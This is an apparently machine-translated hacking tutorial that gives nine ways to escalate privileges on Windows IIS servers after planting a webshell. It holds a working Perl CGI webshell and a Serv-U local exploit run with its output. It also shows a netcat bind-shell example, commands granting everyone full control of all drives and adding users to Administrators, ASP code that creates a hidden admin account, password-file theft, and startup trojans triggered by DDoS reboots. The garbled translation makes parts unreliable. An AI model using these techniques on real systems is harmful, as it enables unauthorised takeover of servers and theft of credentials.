Promotion (Web) permissions Ultimate 9 Tips-security-related

When we get a webshell, the next thing to do is to elevate the privileges
The personal summary is as follows:
1:c:\documents and Settings\All Users\Application Data\symantec\pcanywhere See if you can jump to this directory, if that's the best thing to do, directly under its CIF file, Get pcanywhere Password, login
2.c:\winnt\system32\config came in here under its Sam, cracked the user's password
The software that uses to crack Sam's password has lc,saminside
3.c:\documents and Settings\All users\"Start menu \ program see here to jump no, we can get a lot of useful information from here
Can see a lot of shortcuts, we generally choose Serv-u, and then local view properties, know the path, see whether to jump
After entering, if have permission to modify Servudaemon.ini, add a user up, the password is empty
[User=wekwen|1]
password=
homedir=c:timeout=600
Maintenance=system
access1=c:\| Rwamelcdp
access1=d:\| Rwamelcdp
access1=f:\| Rwamelcdp
skeyvalues=
This user has the highest privileges, then we can ftp up to quote site exec xxx to elevate permissions

4.c:\winnt\system32\inetsrv\data is this directory, the same is the Erveryone full control, all we have to do is to upload the tools of elevated privileges, and then execute
5. See if you can jump to the following directory
c:\php, with Phpspy.
C:\prel, sometimes not necessarily this directory (also available by downloading the shortcut to see the properties) with the CGI Webshell
#!/usr/bin/perl
Binmode (STDOUT);
Syswrite (STDOUT, "content-type:text/html\r\n\r\n", 27);
$_ = $ENV {query_string};
S/%20//ig;
S/%2f/\//ig;
$execthis = $_;
Syswrite (STDOUT, "Open (STDERR, ">&stdout") | | Die "Can ' t redirect STDERR";
System ($execthis);
Syswrite (STDOUT, "\r\n</pre>Close (STDERR);
Close (STDOUT);
Exit
Save as CGI execution,
If not, you can try PL extension, the CGI file just changed to PL file, submitted Http://anyhost//cmd.pl?dir
"Access Denied" is displayed, indicating that it can be executed! Submit now: First upload a su.exe (ser-u tools) to the Prel bin directory
Http://anyhost//cmd.pl?c\perl\bin\su.exe
Return:
Serv-u >3.x local exploit by Xiaolu
Usage:serv-u.exe "Command"
Example:serv-u.exe "Nc.exe-l-P 99-e cmd.exe"
Now is the IUSR permission to submit:
Http://anyhost//cmd.pl?c\perl\bin\su.exe "Cacls.exe c:/e/t/g everyone:f"
Http://anyhost//cmd.pl?c\perl\bin\su.exe "Cacls.exe d:/e/t/g everyone:f"
Http://anyhost//cmd.pl?c\perl\bin\su.exe "Cacls.exe e:/e/t/g everyone:f"
Http://anyhost//cmd.pl?c\perl\bin\su.exe "Cacls.exe f:/e/t/g everyone:f"
If you return the following information, it means success.
Serv-u >3.x local exploit by Xiaolu
<220 serv-u FTP Server v5.2 for WinSock ready ...
>user Localadministrator
<331 User name Okay, need password.
******************************************************
>pass #l @ $ak #.lk;0@p
<230 User logged in, proceed.
******************************************************
>site Maintenance
******************************************************
[+] Creating New Domain ...
<200-domainid=2
<220 Domain Settings saved
******************************************************
[+] Domain Xl:2 Created
[+] Creating Evil User
<200-user=xl
User Settings saved
******************************************************
[+] Now exploiting ...
>user XL
<331 User name Okay, need password.
******************************************************
>pass 111111
<230 User logged in, proceed.
******************************************************
[+] Now Executing:cacls.exe C:/e/t/g everyone:f
<220 Domain deleted
So all partitions are fully controlled for everyone
Now we are raising our users to admin:
Http://anyhost//cmd.pl?c\perl\bin\su.exe "net localgroup Administrators Iusr_anyhost/add"

6. Can successfully run "cscript C:\Inetpub\AdminScripts\adsutil.vbs get W3svc/inprocessisapiapps" to elevate permissions
With this cscript C:\Inetpub\AdminScripts\adsutil.vbs get W3svc/inprocessisapiapps
To view a privileged DLL file: Idq.dll httpext.dll httpodbc.dll Ssinc.dll msw3prt.dll
and add Asp.dll to the privileged tribe.
Asp.dll is placed in C:\winnt\system32\inetsrv\asp.dll (different machine positions are not necessarily the same)
We're adding cscript adsutil.vbs Set/w3svc/inprocessisapiapps "C:\WINNT\system32\idq.dll" C:\WINNT\system32\inetsrv\ Httpext.dll "" C:\WINNT\system32\inetsrv\httpodbc.dll "" C:\WINNT\system32\inetsrv\ssinc.dll "" C:\WINNT\system32\ Msw3prt.dll "" C:\winnt\system32\inetsrv\asp.dll "
You can use cscript adsutil.vbs Get/w3svc/inprocessisapiapps to see if it's added.
7. Can also use this code to try to ascend, as if the effect is not obvious
<<%response.expires=0 ">% @codepage =936%><%response.expires=0
On Error Resume Next
Session.timeout=50
server.scripttimeout=3000
Set Lp=server.createobject ("Wscript.Network")
oz= "winnt://" &lp.computername
Set Ob=getobject (oz)
Set oe=getobject (oz& "/administrators,group")
Set Od=ob. Create ("User", "wekwen$")
Od. SetPassword "Wekwen" <-----password
Od. SetInfo
Set of=getobject (oz& "/wekwen$,user")
Oe. Add (Of. ADsPath)
Response.Write "wekwen$ Super Account Build Success!" %>

Use this code to check if the promotion succeeds
<% @codepage =936%>
<%response.expires=0
On Error Resume Next ' Find Administrators group account number
Set Tn=server. CreateObject ("Wscript.Network")
Set objgroup=getobject ("winnt://" &tN.ComputerName& "/administrators,group")
For all admin in Objgroup.members
Response.Write Admin. name& "<br>"
Next
If Err Then
Response.Write "No Way: Wscript.Network"
End If
%>
8.c:\program Files\java Web Start here if you can, generally very small, you can try to use JSP Webshell, heard that the right is very small, I have not met.
9. Finally, if the host settings are very abnormal, you can try the C:\Documents and Settings\All users\"Start" menu \ Program \ Boot "Write Bat,vbs Trojans.
Wait until the host restarts or you DDoS force it to reboot to achieve the goal of elevation of privilege.